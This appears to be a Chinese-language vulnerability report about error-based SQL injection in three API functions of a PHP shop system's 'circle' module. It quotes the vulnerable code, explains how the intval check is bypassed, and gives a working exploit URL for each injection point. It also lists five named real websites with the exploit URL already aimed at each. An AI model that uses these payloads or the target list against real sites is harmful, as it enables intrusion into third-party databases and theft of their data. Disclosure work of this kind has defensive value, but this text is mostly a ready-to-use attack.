### 简要描述:
直接出数据
### 详细说明:
先来五个互联网实例
```
http://www.0795hui.com/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1)
```
```
http://www.hfmy.cc/modules/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1)
```
```
http://sn.atmbux.com/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1)
```
```
http://www.wbshyw.com/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1)
```
```
http://o.yugongw.com/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1)
```
注入#1
看到circle\control\api.php
```
public function get_theme_listOp() {
$result = '';
$data_count = 2;
if(!empty($_GET['data_count']) && intval($_GET['data_count']) > 0) {
$data_count = $_GET['data_count'];
}
$model = Model();
$theme_list = $model->table('circle_theme')->field('*, is_recommend*rand()*10000 + has_affix*rand() as rand')->where(array('circle_status'=>1, 'is_closed'=>0))->where(array('has_affix'=>1))->order('rand desc')->limit($data_count)->select();
if(!empty($theme_list)){
$theme_list = array_under_reset($theme_list, 'theme_id'); $themeid_array = array_keys($theme_list);
// 附件
$affix_list = $model->table('circle_affix')->where(array('theme_id'=>array('in', $themeid_array), 'affix_type'=>1))->group('theme_id')->select();
if(!empty($affix_list)) $affix_list = array_under_reset($affix_list, 'theme_id');
foreach ($theme_list as $key=>$val){
if(isset($affix_list[$val['theme_id']])) $theme_list[$key]['affix'] = themeImageUrl($affix_list[$val['theme_id']]['affix_filethumb']);
}
}
if($this->data_type === 'json') {
$result = json_encode($theme_list);
} else {
Tpl::output('theme_list', $theme_list);
ob_start();
Tpl::showpage('api_theme_list', 'null_layout');
$result = ob_get_clean();
}
$this->return_result($result);
}
```
if(!empty($_GET['data_count']) && intval($_GET['data_count']) > 0) {
$data_count = $_GET['data_count'];
}
这里存在很明显的逻辑错误,因为intval(1xxxx)=1,然后直接进入了limit没有单引号包裹。
造成注入。
exp为
```
index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1)
```
注入#2
```
public function get_reply_themelistOp() {
$result = '';
$data_count = 3;
if(!empty($_GET['data_count']) && intval($_GET['data_count']) > 0) {
$data_count = $_GET['data_count']; //注入2
}
$model = Model();
$reply_themelist = $model->table('circle_theme')->where(array('is_closed'=>0))->order('theme_commentcount desc')->limit($data_count)->select();
if($this->data_type === 'json') {
$result = json_encode($reply_themelist);
} else {
Tpl::output('reply_themelist', $reply_themelist);
ob_start();
Tpl::showpage('api_reply_themelist', 'null_layout');
$result = ob_get_clean();
}
$this->return_result($result);
}
```
exp为
```
<code>index.php?act=api&op=get_reply_themelist&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1)
```
注入#3
```
public function get_more_memberthemeOp(){
$result = '';
$data_count = 4;
if(!empty($_GET['data_count']) && intval($_GET['data_count']) > 0) {
$data_count = $_GET['data_count']; //注入3
}
$model = Model();
$more_membertheme = $model->table('circle_member,circle_theme')->field('circle_member.*,circle_theme.*, circle_member.is_recommend*10000*rand()+(circle_member.cm_thcount)/10000 as rand')
->order('rand desc')
->join('inner')->on('circle_member.member_id = circle_theme.member_id and circle_member.circle_id = circle_theme.circle_id')
->group('circle_member.member_id,circle_member.circle_id')->limit($data_count)->select();
if($this->data_type === 'json') {
$result = json_encode($more_membertheme);
} else {
Tpl::output("more_membertheme", $more_membertheme);
ob_start();
Tpl::showpage('api_more_membertheme', 'null_layout');
$result = ob_get_clean();
$this->return_result($result);
}
}
```
exp为
```
index.php?act=api&op=get_more_membertheme&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1)
```
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201507/082258252e0d49d1cd139ff4c9f88ad0337d6eda.png" alt="QQ截图20150708225544.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/082258252e0d49d1cd139ff4c9f88ad0337d6eda.png)
暂无评论